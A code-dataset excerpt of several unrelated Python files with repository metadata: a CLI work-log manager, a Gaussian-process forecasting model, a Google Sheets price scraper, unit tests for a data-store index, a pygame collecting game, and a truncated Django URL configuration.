'function': self.search_entries},
'o': {'text': 'Options',
'function': self.options},
'q': {'text': 'Quit program',
'function': self.quit_program}
}
while True:
print("\nMAIN MENU")
print("What would you like to do?")
for key, value in inputs.items():
print("{}) {}".format(key, value['text']))
user_entry = input("> ").lower()
print(user_entry)
if user_entry not in inputs.keys():
continue
return inputs[user_entry]['function']
def add_entry(self):
"""This is the menu where the user can add a task that was completed
"""
while True:
print("\nADD ENTRY")
print("Username")
input_text = input("Enter your name > ")
username = input_text
date = None
while date is None:
print("Date of the Task")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
date = user_entry[1]
date_string = self.date_to_string(date, target='file')
print("Name of the Task")
input_text = input("Enter the name of the task > ")
task_name = input_text
time_spent = None
while time_spent is None:
print("Time spent")
print("Enter a whole number of minutes (rounded)")
input_text = input("> ")
try:
time_spent = int(input_text)
except ValueError:
print("Invalid value, please try again")
continue
if time_spent < 0:
print("Invalid value, please try again")
continue
print("Notes")
input_text = input("(Optional, leave blank for none) ")
notes = input_text
# call method to write data to file
dbm = DBManager()
file_data = {
settings.HEADERS['user']: username,
settings.HEADERS['date']: date_string,
settings.HEADERS['task_name']: task_name,
settings.HEADERS['duration']: time_spent,
settings.HEADERS['notes']: notes
}
dbm.add_entry(file_data)
return self.main_menu
def options(self):
"""This is the menu where the user can specify user-configurable
options
"""
print('OPTIONS')
print("Choose a display date format")
menu_choices = list(settings.DATE_FORMATS.keys())
menu_size = len(menu_choices)
for i in range(len(menu_choices)):
print("({}) - {}".format(i + 1, menu_choices[i]))
input_text = input("> ")
if input_text in [str(x) for x in range(1, menu_size + 1)]:
choice = int(input_text) - 1
choice = menu_choices[choice]
print("You chose: {}".format(choice))
self.OPTIONS['date format'] = settings.DATE_FORMATS[choice]
print('going back to main menu')
else:
print("Invalid entry, returning to main menu")
return self.main_menu
def search_entries(self):
"""This is the search menu. The user selects how they want to search.
"""
inputs = {
'l': {'text': 'employee names List',
'function': self.search_employee},
'e': {'text': 'Employee name Search',
'function': self.search_employee_text},
'd': {'text': 'single Date',
'function': self.search_exact_date},
'r': {'text': 'date Range',
'function': self.search_date_range},
't': {'text': 'Time spent',
'function': self.search_time_spent},
's': {'text': 'text Search',
'function': self.search_text_search},
'b': {'text': 'Back to main menu',
'function': self.main_menu}
}
while True:
print("\nSEARCH ENTRIES")
print("How would you like to search?")
for key, value in inputs.items():
print("{}) {}".format(key, value['text']))
user_entry = input("> ").lower()
if user_entry not in inputs.keys():
continue
return inputs[user_entry]['function']
def quit_program(self):
print("Quitting")
self.quit = True
def present_results(self):
"""Show all the results from the search and then provide interaction
choices
"""
inputs = {
'n': {'text': 'Next page',
'function': self.next_page},
'p': {'text': 'Previous page',
'function': self.previous_page},
'v': {'text': 'View detail',
'function': self.select_detail},
'e': {'text': 'Edit',
'function': self.edit_record},
'd': {'text': 'Delete',
'function': self.delete_record},
'm': {'text': 'go back to Main menu',
'function': self.main_menu},
'q': {'text': 'quit',
'function': self.quit_program},
}
if self.current_page_start == 0:
del(inputs['p'])
next_start = self.current_page_start + self.OPTIONS['entries per page']
if next_start >= len(self.records):
del(inputs['n'])
print("\nSearch Results")
if len(self.records) > next_start:
current_page_end = next_start
else:
current_page_end = len(self.records) - 1
for index in range(self.current_page_start, current_page_end + 1):
value = self.records[index]
short_form = self.display_entry(value, return_only=True)
print("{}) {}".format(index + 1, short_form))
print("\nAvailable actions:")
for key, value in inputs.items():
print('{}) {}'.format(key, value['text']))
while True:
user_entry = input("> ").lower()
if user_entry not in inputs.keys():
continue
return inputs[user_entry]['function']
def present_next_result(self):
"""Show the next available result"""
inputs = {
'p': {'text': 'Previous',
'function': self.previous_result},
'n': {'text': 'Next',
'function': self.next_result},
'b': {'text': 'Back to list view',
'function': self.present_results},
'e': {'text': 'Edit',
'function': self.edit_current_record},
'd': {'text': 'Delete',
'function': self.delete_current_record},
'm': {'text': 'go back to Main menu',
'function': self.main_menu},
'q': {'text': 'quit',
'function': self.quit_program},
}
if self.current_record == 0:
del(inputs['p'])
if self.current_record == len(self.records) - 1:
del(inputs['n'])
record = self.records[self.current_record]
self.display_entry(record, verbose=True)
print("\nAvailable actions:")
for key, value in inputs.items():
print('{}) {}'.format(key, value['text']))
while True:
user_entry = input("> ").lower()
if user_entry not in inputs.keys():
continue
return inputs[user_entry]['function']
# Specific Search Menus
# .....................
def search_employee(self):
"""This is the menu where the user is given a list of all employees
who have entries, and can select a particular employee to see
all their entries
"""
print("\nSEARCH BY EMPLOYEE")
# load the db manager
dbm = DBManager()
employee_names = dbm.view_employees()
for i, value in enumerate(employee_names):
print("{}) {}".format(i + 1, value['name']))
selected_employee = None
while selected_employee is None:
user_input = input("> ")
# perform input validation
try:
user_input = int(user_input) - 1
except ValueError:
print("Invalid value, try again")
continue
if user_input < 0:
print("Value out of range. Try again.")
continue
try:
selected_employee = employee_names[user_input]['name']
except IndexError:
print("Value out of range. Try again.")
continue
# when an employee is selected, show all the entries with that e'ee
matching_records = dbm.view_everything(employee=selected_employee)
self.records = matching_records
self.current_record = 0
return self.present_next_result
def search_employee_text(self):
"""This is the menu where the user enters a text string and is presented
with all employee names containing that string
"""
print('FIND EMPLOYEE NAME USING TEXT STRING')
print("Enter the text string to search on")
input_text = input("> ")
text_string = input_text
# load db
dbm = DBManager()
employee_names = dbm.view_names_with_text(text_string)
for i, value in enumerate(employee_names):
print("{}) {}".format(i + 1, value['name']))
selected_employee = None
while selected_employee is None:
user_input = input("> ")
# perform input validation
try:
user_input = int(user_input) - 1
except ValueError:
print("Invalid value, try again")
continue
if user_input < 0:
print("Value out of range. Try again.")
continue
try:
selected_employee = employee_names[user_input]['name']
except IndexError:
print("Value out of range. Try again.")
continue
# when an employee is selected, show all the entries with that e'ee
matching_records = dbm.view_everything(employee=selected_employee)
self.records = matching_records
self.current_record = 0
return self.present_next_result
def search_exact_date(self):
"""This is the menu where the user browses dates and entries and picks
the date from a list
"""
print("\nSEARCH EXACT DATE")
# load the db manager
dbm = DBManager()
date_records = dbm.view_dates()
for i, value in enumerate(date_records):
value = self.date_to_string(value['date'])
print("{}) {}".format(i + 1, value))
selected_date = None
while selected_date is None:
user_input = input("> ")
# perform input validation
try:
user_input = int(user_input) - 1
except ValueError:
print("Invalid value, try again")
continue
if user_input < 0:
print("Value out of range. Try again.")
continue
try:
selected_date = date_records[user_input]['date']
except IndexError:
print("Value out of range. Try again.")
continue
# when a date is selected, show all the entries with that date
matching_records = dbm.view_entries_for_date(selected_date)
self.records = matching_records
self.current_record = 0
return self.present_next_result
def search_date_range(self):
"""This is the menu where the user can enter a from date and to date
and get back every entry from within that range
"""
print('SEARCH DATE RANGE')
start_date = None
end_date = None
# get start_date
while start_date is None:
print("Start Date:")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
start_date = user_entry[1]
# get end_date
while end_date is None:
print("End Date:")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
end_date = user_entry[1]
# load db
dbm = DBManager()
# switch start and end dates if end < start
if end_date < start_date:
current_date = end_date
end_date = start_date
start_date = end_date
else:
current_date = start_date
# get all records in date range
matching_records = dbm.view_entries_for_date_range(start_date,
end_date)
print("\nShowing entries:")
if len(matching_records) == 0:
print("\nNo matches, returning to search menu")
return self.search_entries
self.records = matching_records
self.current_record = 0
return self.present_next_result
def search_time_spent(self):
"""This is the menu where the user enters the number of minutes a task
took and be able to choose one to see entries from
"""
print('SEARCH BY TIME SPENT')
print("Time spent")
time_spent = None
while time_spent is None:
input_text = input("Enter a whole number of minutes (rounded) ")
try:
time_spent = int(input_text)
except ValueError:
print("Invalid value")
continue
# load db
dbm = DBManager()
matching_records = dbm.view_entries_for_duration(time_spent)
if len(matching_records) == 0:
print("\nNo matches, returning to search menu")
return self.search_entries
self.records = matching_records
self.current_record = 0
return self.present_next_result
def search_text_search(self):
"""This is the menu where the user enters a text string and is presented
with all entries containing that string in the task name or notes
"""
print('SEARCH USING TEXT STRING')
print("Enter the text string to search on")
input_text = input("> ")
text_string = input_text
# load db
dbm = DBManager()
matching_records = dbm.view_entries_with_text(text_string)
if len(matching_records) == 0:
print("\nNo matches, returning to search menu")
return self.search_entries
self.records = matching_records
self.current_record = 0
return self.present_next_result
# Modification Methods
# --------------------
def edit_record(self):
print("edit record")
print('enter the record number to edit')
user_input = input("> ")
match_index = int(user_input) - 1
record = self.records[match_index]
# get the new values for the record
print("New Username")
input_text = input("Enter the username > ")
username = input_text
date = None
while date is None:
print("New date of the Task")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
date = user_entry[1]
date_string = self.date_to_string(date, target='file')
print("New name of the Task")
input_text = input("Enter the name of the task > ")
task_name = input_text
time_spent = None
while time_spent is None:
print("New time spent")
input_text = input("Enter a whole number of minutes (rounded) ")
try:
time_spent = int(input_text)
except ValueError:
print("Invalid value")
continue
print("New notes")
input_text = input("(Optional, leave blank for none) ")
notes = input_text
# load the db
dbm = DBManager()
# old_entry = dbm.view_entries
new_values = {
'name': username,
'date': date_string,
'task_name': task_name,
'duration': time_spent,
'notes': notes
}
dbm.edit_entry(record, new_values)
return self.main_menu
def edit_current_record(self):
print("edit record")
match_index = self.current_record
record = self.records[match_index]
# get the new values for the record
print("New Username")
input_text = input("Enter the username > ")
username = input_text
date = None
while date is None:
print("New date of the Task")
user_entry = self.date_entry()
if user_entry[0] is not None: # error
print(user_entry[0])
continue
else:
date = user_entry[1]
print("New name of the Task")
input_text = input("Enter the name of the task > ")
task_name = input_text
time_spent = None
while time_spent is None:
print("New time spent")
input_text = input("Enter a whole number of minutes (rounded) ")
try:
time_spent = int(input_text)
except ValueError:
print("Invalid value")
continue
print("New notes")
input_text = input("(Optional, leave blank for none) ")
notes = input_text
# load the db
dbm = DBManager()
new_values = {
'name': username,
'date': date,
'task_name': task_name,
'duration': time_spent,
'notes': notes
}
dbm.edit_entry(record, new_values)
return self.main_menu
def select_detail(self):
print("View record")
print('enter the record number to view')
user_input = input("> ")
match_index = int(user_input) - 1
self.current_record = match_index
return self.present_next_result
def delete_record(self):
print("delete record")
print('enter the record number to delete')
user_input = input("> ")
match_index = int(user_input) - 1
record = self.records[match_index]
print(record)
# load db
dbm = DBManager()
dbm.delete_entry(record)
print("Entry deleted")
return self.main_menu
def delete_current_record(self):
print("delete record")
match_index = self.current_record
record = self.records[match_index]
# load db
dbm = DBManager()
dbm.delete_entry(record)
print("Entry deleted")
return self.main_menu
# Other UI Methods
# ----------------
def display_entry(self, entry, verbose=False, return_only=False):
"""This method displays a selected entry, showing:
- date (read from file in iso 8601 and displayed in whatever is set in
options)
- task name
- time taken
- any notes
"""
username = entry[settings.HEADERS['user']]
date_object = entry[settings.HEADERS['date']]
date = self.date_to_string(date_object, target="display")
task_name = entry[settings.HEADERS['task_name']]
time_taken = entry[settings.HEADERS['duration']]
notes = entry[settings.HEADERS['notes']]
if verbose:
line0 = username
print(line0)
line1 = "{}: {}".format(date, task_name)
print(line1)
print("-" * len(line1))
print("{} minutes".format(time_taken))
print("{}".format(notes))
else:
short_form = "{}: {} ({}m): {} | {}".format(username,
date,
time_taken,
task_name,
notes)
if return_only:
return short_form
else:
print(short_form)
def previous_result(self):
"""load previous result"""
self.current_record -= 1
return self.present_next_result
def next_result(self):
"""load next result"""
self.current_record += 1
return self.present_next_result
def previous_page(self):
"""load previous page of results"""
self.current_page_start -= self.OPTIONS['entries per page']
return self.present_results
def next_page(self):
"""load next page of results"""
self.current_page_start += self.OPTIONS['entries per page']
return self.present_results
# Helper Methods
# --------------
def validate_date_entry(self, date_string, date_format):
"""Takes a date_string and date_format and attempts to create
a valid datetime object with those imports.
Returns a tuple in the form (error, datetime) where:
- `error` is None if valid and a description of the error text if
invalid;
- `datetime` is a datetime object if valid and None if invalid
"""
try:
naive_datetime = datetime.datetime.strptime(
date_string,
date_format['datetime format']
)
except ValueError:
error_text = "{date_string} is not valid in format {date_format}"
error_args = {"date_string": date_string,
"date_format": date_format['UI format']}
return (error_text.format(**error_args), None)
else:
if not self.OPTIONS['allow future dates']:
if naive_datetime > datetime.datetime.now():
error_text = "dates in the future are not permitted"
error_args = {"date_string": date_string,
"date_format": date_format['UI format']}
return (error_text.format(**error_args), None)
if naive_datetime < self.OPTIONS['earliest allowed date']:
bad_date = self.OPTIONS['earliest allowed date'].strftime(
self.OPTIONS['date format']['datetime format']
)
error_text = "dates before {} are not permitted".format(
bad_date
)
error_args = {"date_string": date_string,
"date_format": date_format['UI format']}
return (error_text.format(**error_args), None)
return (None, naive_datetime)
def date_entry(self):
"""This helper function asks for a date input in the user's preferred
format and then returns that date as a naive datetime object
"""
date_format = self.OPTIONS['date format']
input_text = "Please use the '{}' date format: "
user_entry = input(input_text.format(date_format['UI format']))
# validate date entry
validated = self.validate_date_entry(user_entry, date_format)
return validated
def date_to_string(self, date_object, target='display'):
"""This helper function takes a naive date object and returns a
string representation in:
- `target='display'`: the user's preferred display format
- `target='file': the save format
"""
if target == 'display':
option = self.OPTIONS['date format']
string_format = option['datetime format']
else: # 'file' or unrecognised target, fallback to write mode
option = self.OPTIONS['save format (date)']
string_format = option['datetime format']
return date_object.strftime(string_format)
# ---------------------------
if __name__ == "__main__":
menu = Menu()
| Crossroadsman/treehouse-techdegree-python-project4 | work_log.py | work_log.py | py | 26,340 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "wl_settings.DATE_FORMATS",
"line_number": 35,
"usage_type": "attribute"
},
{
"api_name": "wl_settings.DATE_FORMATS",
"line_number": 36,
"usage_type": "attribute"
},
{
"api_name": "datetime.datetime",
"line_number": 40,
"usage_type": "call"
},
{
"api... |
23199437019 | import math
import torch
import gpytorch
import numpy as np
from voltron.means import EWMAMean, DEWMAMean, TEWMAMean
from botorch.models import SingleTaskGP
from botorch.optim.fit import fit_gpytorch_torch
from voltron.rollout_utils import nonvol_rollouts
class BasicGP():
def __init__(self, train_x, train_y, kernel="matern", mean='constant',
k=400, num_mixtures=10):
# super(BasicGP, self).__init__(train_x, train_y, likelihood)
if mean.lower() == 'constant':
mean_module = gpytorch.means.ConstantMean().to(train_x.device)
elif mean.lower() == 'ewma':
mean_module = EWMAMean(train_x, train_y, k).to(train_x.device)
elif mean.lower() == 'dewma':
mean_module = DEWMAMean(train_x, train_y, k).to(train_x.device)
elif mean.lower() == 'tewma':
mean_module = TEWMAMean(train_x, train_y, k).to(train_x.device)
else:
print("ERROR: Mean not implemented")
if kernel.lower() == 'matern':
covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.MaternKernel())
elif kernel.lower() in ['sm', 'spectralmixture', 'spectral']:
covar_module = gpytorch.kernels.SpectralMixtureKernel(num_mixtures=num_mixtures)
covar_module.initialize_from_data(train_x, train_y)
elif kernel.lower() == 'rbf':
covar_module = gpytorch.kernels.ScaleKernel(gpytorch.kernels.RBFKernel())
else:
print("ERROR: Kernel not implemented")
self.model = SingleTaskGP(train_x.view(-1, 1), train_y.reshape(-1, 1),
covar_module=covar_module,
likelihood=gpytorch.likelihoods.GaussianLikelihood())
self.model.mean_module = mean_module
def Train(self, train_iters=400, display=False):
mll = gpytorch.mlls.ExactMarginalLogLikelihood(self.model.likelihood, self.model)
fit_gpytorch_torch(mll, options={'maxiter':train_iters, 'disp':display})
def Forecast(self, test_x, nsample=100):
if not isinstance(self.model.mean_module, (EWMAMean, DEWMAMean, TEWMAMean)):
samples = self.model.posterior(test_x).sample(torch.Size((nsample, )))
else:
samples = nonvol_rollouts(self.model.train_inputs[0].squeeze(),
self.model.train_targets.squeeze(),
test_x, self.model, nsample)
return samples.squeeze() | g-benton/Volt | voltron/models/.ipynb_checkpoints/BasicGPModels-checkpoint.py | BasicGPModels-checkpoint.py | py | 2,558 | python | en | code | 41 | github-code | 1 | [
{
"api_name": "gpytorch.means.ConstantMean",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "gpytorch.means",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "voltron.means.EWMAMean",
"line_number": 17,
"usage_type": "call"
},
{
"api_name":... |
72936024995 | import gspread
import pandas as pd
import os
import requests
from google.oauth2 import service_account
# from oauth2client.service_account import ServiceAccountCredentials
from bs4 import BeautifulSoup
scope = ['https://spreadsheets.google.com/feeds',
'https://www.googleapis.com/auth/drive']
secret_file = os.path.join(os.getcwd(), 'client_secret.json')
credentials = service_account.Credentials.from_service_account_file(
secret_file, scopes=scope)
gc = gspread.authorize(credentials)
sht1 = gc.open_by_key('1Jgsf-5wtsCdyDiIp-P_EZbnoT6Ya_0URC3I8s1-5GeM')
df = pd.DataFrame(sht1.worksheet("Fontes").get_all_values()[1:])
df.columns = df.iloc[0]
df.drop(df.index[0], inplace=True)
header = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64)"
"AppleWebKit/537.36 (KHTML, like Gecko)"
"Chrome/54.0.2840.71 Safari/537.36",
"upgrade-insecure-requests": "1",
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,"
"image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3",
"accept-encoding": "gzip, deflate, br",
"accept-language": "en-GB,en-US;q=0.9,en;q=0.8",
"cache-control": "max-age=0"}
res = requests.get(df['Competitor Link'].iloc[0], headers=header)
soup = BeautifulSoup(res.text, "html.parser")
price = soup.find("div", {"class": "preco_normal"}).text.replace("R$", "")
print(price)
sht1.worksheet("Fontes").update_acell('C3', price)
| arthurnovello/PriceMonitor | app.py | app.py | py | 1,467 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "google.oauth2.service_account.Cre... |
20505915805 | # -*- coding: utf-8 -*-
#
# Copyright (c) 2012 David Townshend
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 675 Mass Ave, Cambridge, MA 02139, USA.
from norman._six import assert_raises
from norman import NotSet, Field, Store, Index
try:
from unittest.mock import Mock, patch
except ImportError:
from mock import Mock, patch
##### Index tests
class TestIndex_Ordered(object):
'Tests starting with an empty index'
def setup(self):
field = Mock(key=lambda x: x)
self.i = Index(field)
self.orecords = ['M' + str(i) for i in range(6)]
self.urecords = ['U0', 'U1', 'U2']
self.i._ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
self.ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
self.unordered = self.i._unordered.copy()
self.i._unordered[-1] = [('1', self.urecords[0]),
('1', self.urecords[1])]
self.i._unordered[-2] = [('2', self.urecords[2])]
self.unordered[-1] = [('1', self.urecords[0]),
('1', self.urecords[1])]
self.unordered[-2] = [('2', self.urecords[2])]
def test_insert(self):
r = Mock()
self.i.insert(1, r)
self.orecords.insert(2, r)
assert self.i._ordered == ([0, 1, 1, 2, 3, 3, 4], self.orecords)
assert self.i._unordered == self.unordered
def test_len(self):
assert len(self.i) == 9, len(self.i)
def test_remove(self):
self.i.remove(2, self.orecords[2])
del self.orecords[2]
expect = ([0, 1, 3, 3, 4], self.orecords)
assert self.i._ordered == expect
assert self.i._unordered == self.unordered
def test_iter_eq(self):
got = set(self.i == 3)
expect = set(self.orecords[3:5])
assert got == expect, (got, expect)
def test_iter_ne(self):
expect = set(self.orecords[:3] + self.orecords[5:] + self.urecords)
got = set(self.i != 3)
assert got == expect, (got, expect)
def test_iter_lt(self):
got = set(self.i < 3)
expect = set(self.orecords[:3])
assert got == expect, (got, expect)
def test_iter_le(self):
got = set(self.i <= 3)
expect = set(self.orecords[:5])
assert got == expect, (got, expect)
def test_iter_gt(self):
got = set(self.i > 2)
expect = set(self.orecords[3:])
assert got == expect, (got, expect)
def test_iter_ge(self):
got = set(self.i >= 2)
expect = set(self.orecords[2:])
assert got == expect, (got, expect)
class TestIndex_UnOrdered(object):
'Tests starting with an empty index'
def setup(self):
def key(value):
raise TypeError
field = Mock(key=key)
self.i = Index(field)
self.orecords = ['M' + str(i) for i in range(6)]
self.urecords = ['U0', 'U1', 'U2']
self.i._ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
self.ordered = ([0, 1, 2, 3, 3, 4], [r for r in self.orecords])
self.unordered = self.i._unordered.copy()
self.i._unordered[-1] = [('1', self.urecords[0]),
('1', self.urecords[1])]
self.i._unordered[-2] = [('2', self.urecords[2])]
self.unordered[-1] = [('1', self.urecords[0]),
('1', self.urecords[1])]
self.unordered[-2] = [('2', self.urecords[2])]
def mockhash(v):
try:
return -int(v)
except ValueError:
raise TypeError
patch('norman._store.hash', mockhash, create=True).start()
patch('norman._store.id', lambda v: 10, create=True).start()
def teardown(self):
patch.stopall()
def test_insert1(self):
r = Mock()
self.i.insert('4', r)
self.unordered[-4] = [('4', r)]
assert self.i._unordered == self.unordered
assert self.i._ordered == self.ordered
def test_insert2(self):
r = Mock()
self.i.insert('2', r)
self.unordered[-2].append(('2', r))
assert self.i._unordered == self.unordered
assert self.i._ordered == self.ordered
def test_insert_id(self):
r = Mock()
self.i.insert('a', r)
self.unordered[10] = [('a', r)]
assert self.i._unordered == self.unordered
assert self.i._ordered == self.ordered
def test_insert_NotSet(self):
r = Mock()
self.i.insert(NotSet, r)
self.unordered[NotSet] = [(NotSet, r)]
assert self.i._unordered == self.unordered
assert self.i._ordered == self.ordered
def test_remove(self):
self.i.remove('1', self.urecords[1])
self.unordered[-1].pop()
assert self.i._unordered == self.unordered
assert self.i._ordered == self.ordered
def test_remove_id(self):
self.i.remove('2', self.urecords[2])
del self.unordered[-2]
assert self.i._unordered == self.unordered
assert self.i._ordered == self.ordered
def test_iter_eq(self):
expect = set(self.urecords[:2])
got = set(self.i == '1')
assert got == expect, (got, expect)
def test_iter_ne(self):
expect = set([self.urecords[2]] + self.orecords)
got = set(self.i != '1')
assert got == expect, (got, expect)
def test_comparison(self):
with assert_raises(TypeError):
set(self.i < '1')
with assert_raises(TypeError):
set(self.i <= '1')
with assert_raises(TypeError):
set(self.i > '1')
with assert_raises(TypeError):
set(self.i >= '1')
class TestIndexCornerCases(object):
def test_notset(self):
field = Field()
i = Index(field)
r = Mock()
i.insert(NotSet, r)
assert i._unordered[NotSet] == [(NotSet, r)]
class TestStore(object):
def setup(self):
self.full = Field(default=NotSet)
self.sparse = Field(default= -1)
self.missing = Field(default=NotSet)
self.full._name = 'full'
self.sparse._name = 'sparse'
self.missing._name = 'missing'
self.store = Store()
self.store.add_field(self.full)
self.store.add_field(self.sparse)
def populate(self):
for i in range(5):
self.store.add_record(str(i))
self.store.set(str(i), self.full, i)
for i in [1, 3]:
self.store.set(str(i), self.sparse, i)
def test_add_field(self):
self.populate()
self.store.add_field(self.missing)
assert self.store.get('0', self.missing) == NotSet
def test_add_record(self):
self.store.add_record('new')
assert self.store.has_record('new')
def test_clear(self):
self.populate()
self.store.clear()
assert self.store.record_count() == 0
for index in self.store.indexes.values():
assert len(index) == 0
def test_get(self):
self.populate()
assert self.store.get('0', self.full) == 0
def test_has_record(self):
self.populate()
assert self.store.has_record('0')
assert not self.store.has_record('not a record')
def test_iter_field_full(self):
self.populate()
got = set(self.store.iter_field(self.full))
expect = set([(str(i), i) for i in range(5)])
assert got == expect, got
def test_iter_field_sparse(self):
self.populate()
got = set(self.store.iter_field(self.sparse))
expect = set([('0', -1), ('1', 1), ('2', -1), ('3', 3), ('4', -1)])
assert got == expect, got
def test_iter_records(self):
self.populate()
it = self.store.iter_records()
assert set(it) == set('012324')
def test_record_count(self):
self.populate()
assert self.store.record_count() == 5
def test_remove_record(self):
self.populate()
self.store.remove_record('3')
assert set(self.store.iter_records()) == set('0124')
def test_remove_field(self):
# This merely tests that it runs.
self.populate()
self.store.remove_field(self.full)
def test_set_overwrite(self):
self.populate()
self.store.set('1', self.sparse, 'new value')
assert self.store.get('1', self.sparse) == 'new value'
class TestStoreIndex(object):
def setup(self):
self.f = Field()
self.f._name = 'f'
self.store = Store()
self.store.add_field(self.f)
self.index = self.store.indexes[self.f]
def test_add_record(self):
self.store.add_record('new')
assert self.index._unordered[NotSet] == [(NotSet, 'new')]
assert self.index._ordered == ([], [])
def test_remove_record(self):
self.store.add_record('new')
self.store.remove_record('new')
assert self.index._unordered == {}
assert self.index._ordered == ([], [])
def test_set(self):
self.store.add_record('new')
self.store.set('new', self.f, 'value')
assert self.index._unordered == {}
assert self.index._ordered == ([('1str', 'value')], ['new'])
| aquavitae/norman | tests/test_store.py | test_store.py | py | 10,128 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "mock.Mock",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "norman.Index",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "mock.Mock",
"line_number": 103,
... |
17337628519 | import pygame, sys, time, random
from pygame.locals import *
# Установка pygame.
pygame.init()
mainClock = pygame.time.Clock()
# Настройка окна.
WINDOWWIDTH = 400
WINDIWHEIGHT = 400
windowSurface = pygame.display.set_mode((WINDOWWIDTH, WINDIWHEIGHT), 0, 32)
pygame.display.set_caption('Спрайты и звуки')
# Настройка цвета.
WHITE = (255, 255, 255)
# Создание структуры данных блока.
player = pygame.Rect(300, 100, 40, 40)
playerImage = pygame.image.load('player.png')
playerStretchedImage = pygame.transform.scale(playerImage, (40, 40))
foodImage = pygame.image.load('cherry.png')
foods = []
for i in range(20):
foods.append(pygame.Rect(random.randint(0, WINDOWWIDTH - 20),
random.randint(0, WINDIWHEIGHT - 20), 20, 20))
foodCounter = 0
NEWFOOD = 40
# Создание переменных клавиатуры.
moveLeft = False
moveRight = False
moveUp = False
moveDown = False
MOVESPEED = 6
# Настройка музыка.
pickUpSound = pygame.mixer.Sound('pickup.wav')
pygame.mixer.music.load('gameover.wav')
pygame.mixer.music.play(-1, 0.0)
musicPlaying = True
# Запуск игрового цикла.
while True:
# Проверка наличия события QUIT.
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
if event.type == KEYDOWN:
# Изменение переменных клавиатуры.
if event.key == K_LEFT or event.key == K_a:
moveRight = False
moveLeft = True
if event.key == K_RIGHT or event.key == K_d:
moveLeft = False
moveRight = True
if event.key == K_UP or event.key == K_w:
moveDown = False
moveUp = True
if event.key == K_DOWN or event.key == K_s:
moveUp = False
moveDown = True
if event.type == KEYUP:
if event.key == K_ESCAPE:
pygame.quit()
sys.exit()
if event.key == K_LEFT or event.key == K_a:
moveLeft = False
if event.key == K_RIGHT or event.key == K_d:
moveRight = False
if event.key == K_UP or event.key == K_w:
moveUp = False
if event.key == K_DOWN or event.key == K_s:
moveDown = False
if event.key == K_x:
player.top = random.randint(0, WINDIWHEIGHT - player.height)
player.left = random.randint(0, WINDOWWIDTH - player.width)
if event.key == K_m:
if musicPlaying:
pygame.mixer.music.stop()
else:
pygame.mixer.music.play(-1, 0.0)
musicPlaying = not musicPlaying
if event.type == MOUSEBUTTONUP:
foods.append(pygame.Rect(event.pos[0] - 10, event.pos[1] - 10,
20, 20))
foodCounter += 1
if foodCounter >= NEWFOOD:
# Добавление новой "еды".
foodCounter = 0
foods.append(pygame.Rect(random.randint(0, WINDOWWIDTH - 20),
random.randint(0, WINDIWHEIGHT - 20),
20, 20))
# Создание на поверхности белого фона.
windowSurface.fill(WHITE)
# Перемещение игрока.
if moveDown and player.bottom < WINDIWHEIGHT:
player.top += MOVESPEED
if moveUp and player.top > 0:
player.top -= MOVESPEED
if moveLeft and player.left > 0:
player.left -= MOVESPEED
if moveRight and player.right < WINDOWWIDTH:
player.right += MOVESPEED
# Отображение блока на поверхности.
windowSurface.blit(playerStretchedImage, player)
# Проверка, не пересекся ли блок с каким-либо блоками "еды".
for food in foods[:]:
if player.colliderect(food):
foods.remove(food)
player = pygame.Rect(player.left, player.top,
player.width + 2, player.height + 2)
playerStretchedImage = pygame.transform.scale(playerImage,
(player.width,
player.height))
if musicPlaying:
pickUpSound.play()
# Отображение "еды".
for food in foods:
windowSurface.blit(foodImage, food)
# Вывод окна на экран.
pygame.display.update()
mainClock.tick(40) | pavel-malin/game_python3 | game_python3/spriteAndSounds.py | spriteAndSounds.py | py | 4,973 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "pygame.init",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "pygame.time.Clock",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pygame.time",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "pygame.display.set_mode",... |
39394256532 | from django.conf.urls.static import static
from django.contrib.auth.decorators import login_required
from django.urls import path
from . import views
from .views import AddPostView, UserSettings, UserProfile
from .models import Profile
from newsletter.models import NewsLetter
urlpatterns = [
path(
"",
views.PostList.as_view(),
name="home"
),
path(
'featured/',
views.FeaturedView.as_view(),
name='featured'
),
path(
'featured_post/',
views.FeaturedPost,
name='featured_post'
),
path(
'profile/',
login_required(UserProfile.as_view()),
name='profile'
),
path(
'<pk>/delete_profile/',
login_required(views.DeleteProfile.as_view()),
name='delete_profile'
),
path(
'edit_profile/',
login_required(UserSettings.as_view()),
name='edit_profile'
),
path(
'add_post/',
AddPostView.as_view(),
name='add_post'
),
path(
'pets/',
views.PetsPost,
name='pets'
),
path(
'<slug:slug>/',
views.PostDetail.as_view(),
